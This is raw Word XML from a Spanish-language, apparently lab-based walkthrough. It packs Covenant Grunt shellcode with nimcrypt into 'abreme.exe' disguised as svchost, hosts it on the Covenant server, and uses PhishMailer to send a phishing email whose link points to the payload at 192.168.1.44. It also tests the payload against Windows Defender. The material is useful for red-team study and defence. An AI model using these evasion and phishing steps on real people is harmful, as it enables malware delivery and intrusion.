    <w:p w14:paraId="285EC1A9" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56383F98" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46EC83D5" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8A6581" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6511FB" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="026F9770" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E116195" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BD945F5" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="695D94A7" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="461CC3E7" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58944AB6" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C030122" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A4F471A" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251744256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7E21B0A2" wp14:editId="6D822239">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="95250" r="87630" b="99695"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1278870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19E0A63E" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
                            <w:r w:rsidRPr="006250C1">
                              <w:t>./nimcrypt -f /home/parrot/Descargas/GruntHTTP.bin -t raw -p svchost -o abreme.exe</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5A5646E7" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
                            <w:r>
                              <w:t>-f será la ruta donde está el shellcode generado</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3AEAF677" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
                            <w:r>
                              <w:t>-t será el tipo, en este caso raw</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="62FE184F" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
                            <w:r>
                              <w:t>-p el proceso sobre el que va correr este ejecutable</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="48F769D0" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
                            <w:r>
                              <w:t>-o el archivo de sali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21B0A2" id="_x0000_s1066" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2517442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19E0A63E" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
                      <w:r w:rsidRPr="006250C1">
                        <w:t>./nimcrypt -f /home/parrot/Descargas/GruntHTTP.bin -t raw -p svchost -o abreme.exe</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5A5646E7" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
                      <w:r>
                        <w:t>-f será la ruta donde está el shellcode generado</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3AEAF677" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
                      <w:r>
                        <w:t>-t será el tipo, en este caso raw</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="62FE184F" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
                      <w:r>
                        <w:t>-p el proceso sobre el que va correr este ejecutable</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="48F769D0" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
                      <w:r>
                        <w:t>-o el archivo de salida</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E676A71" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="206B3B28" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CC939A8" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EB5D0D9" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="001A077A" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="019D835A" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12C4D7BC" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24950673" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04253CF4" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23A00195" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C6979A9" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="194634EE" w14:textId="2D2D26C8" w:rsidR="006428DF" w:rsidRDefault="00AD7F15" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B13C35E" wp14:editId="703AE5C8">
            <wp:extent cx="6447619" cy="1828571"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="211550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705" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId304">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6447619" cy="1828571"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35695D36" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2629B6C9" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora guardaremos el exe en el servidor web de Covenant:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66110F18" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="377CEDF3" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16AF7045" wp14:editId="6372BCA3">
            <wp:extent cx="5400040" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="807121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1064" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId305" cstate="screen">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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC16223" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BDEB0E7" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5935861A" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43BBB48C" wp14:editId="130A37F4">
            <wp:extent cx="5400040" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="67999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99105" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId306" cstate="screen">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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75667AC5" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7780C3E9" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A113DFF" wp14:editId="52841582">
            <wp:extent cx="5400040" cy="2719705"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="145660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110" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId307"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085F8654" w14:textId="77777777" w:rsidR="00D1574E" w:rsidRDefault="00D1574E" w:rsidP="00D1574E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53B0EA81" w14:textId="77777777" w:rsidR="00D1574E" w:rsidRDefault="00D1574E" w:rsidP="00D1574E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora usaré la aplicación PhisMailer, la instalación es sencilla sería hacer un git clone del proyecto, movernos a la carpeta extraída y ejecutar este comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45213439" w14:textId="77777777" w:rsidR="00D1574E" w:rsidRDefault="00D1574E" w:rsidP="00D1574E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25DD54FC" w14:textId="77777777" w:rsidR="00D1574E" w:rsidRDefault="00D1574E" w:rsidP="00D1574E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251746304" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7293C714" wp14:editId="2A494680">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="95250" t="95250" r="87630" b="99695"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="4741178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0B604C65" w14:textId="77777777" w:rsidR="00D1574E" w:rsidRDefault="00D1574E" w:rsidP="00D1574E">
                            <w:r w:rsidRPr="00D67061">
                              <w:t>python3 PhishMailer.p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93C714" id="_x0000_s1067" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2517463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" fillcolor="#91bce3 [2168]" stroked="f" strokeweight=".5pt">
                <v:fill color2="#7aaddd [2616]" rotate="t" colors="0 #b1cbe9;.5 #a3c1e5;1 #92b9e4" focus="100%" type="gradient">
                  <o:fill v:ext="view" type="gradientUnscaled"/>
                </v:fill>
                <v:shadow on="t" type="perspective" color="black" opacity="26214f" offset="0,0" matrix="66847f,,,66847f"/>
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="0B604C65" w14:textId="77777777" w:rsidR="00D1574E" w:rsidRDefault="00D1574E" w:rsidP="00D1574E">
                      <w:r w:rsidRPr="00D67061">
                        <w:t>python3 PhishMailer.py</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="37121F10" w14:textId="77777777" w:rsidR="00D1574E" w:rsidRDefault="00D1574E" w:rsidP="00D1574E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D3E88A5" w14:textId="77777777" w:rsidR="00D1574E" w:rsidRDefault="00D1574E" w:rsidP="00D1574E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="730D07FE" w14:textId="77777777" w:rsidR="00D1574E" w:rsidRDefault="00D1574E" w:rsidP="00D1574E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55F8843F" w14:textId="77777777" w:rsidR="00D1574E" w:rsidRDefault="00D1574E" w:rsidP="00D1574E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39F65129" w14:textId="77777777" w:rsidR="00D1574E" w:rsidRDefault="00D1574E" w:rsidP="00D1574E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FA0D71C" w14:textId="77777777" w:rsidR="00D1574E" w:rsidRDefault="00D1574E" w:rsidP="00D1574E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08694F53" w14:textId="77777777" w:rsidR="00D1574E" w:rsidRDefault="00D1574E" w:rsidP="00D1574E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ejecutando el programa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B14EA42" w14:textId="77777777" w:rsidR="00D1574E" w:rsidRDefault="00D1574E" w:rsidP="00D1574E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C6BCE46" w14:textId="77777777" w:rsidR="00D1574E" w:rsidRDefault="00D1574E" w:rsidP="00D1574E">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58225645" wp14:editId="385470A1">
            <wp:extent cx="5400040" cy="4164330"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="20331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105" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId308" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="4164330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E8B4A9" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77678A56" w14:textId="2D5A2032" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora </w:t>
      </w:r>
      <w:r w:rsidR="00D1574E">
        <w:t>crearemos el correo electrónico que enviaremos con la aplicación antes mencionada:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B48D704" w14:textId="77777777" w:rsidR="00D1574E" w:rsidRDefault="00D1574E" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E81F0BE" w14:textId="0543BDAD" w:rsidR="00D1574E" w:rsidRDefault="00D1574E" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12D04CC6" wp14:editId="6258715B">
            <wp:extent cx="5400040" cy="1192530"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1971389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9771" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId309" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1192530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="349E0805" w14:textId="77777777" w:rsidR="00D1574E" w:rsidRDefault="00D1574E" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D76690" w14:textId="5326B1DF" w:rsidR="00D1574E" w:rsidRDefault="00D1574E" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Cambiaré esta href por la dirección del Grunt de covenant:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A33085E" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72D4D330" w14:textId="52B11F3E" w:rsidR="006428DF" w:rsidRDefault="00266596" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r w:rsidRPr="00266596">
        <w:t>http://192.168.1.44/abreme.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12403CE6" w14:textId="77777777" w:rsidR="00266596" w:rsidRDefault="00266596" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02EB8173" w14:textId="0138592D" w:rsidR="00266596" w:rsidRDefault="00266596" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69C1B6B6" wp14:editId="0618CE81">
            <wp:extent cx="5400040" cy="1108075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="789580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80207" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId310" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1108075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B6DEDB" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="279072AB" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Lo primero que voy hacer es activar el Windows Defender:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8BCE4E" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D766B69" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73039CB1" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C9F34C0" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32B78CBB" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="303A0D12" wp14:editId="3E143425">
            <wp:extent cx="6371590" cy="6371590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="489905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05175" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId311">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6371590" cy="6371590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BA79CB" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="428F64F4" w14:textId="0BCFED7C" w:rsidR="00D1574E" w:rsidRDefault="00D1574E" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Crearemos un correo fake en yopmail:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348ACD50" w14:textId="77777777" w:rsidR="00D1574E" w:rsidRDefault="00D1574E" w:rsidP="006428DF">
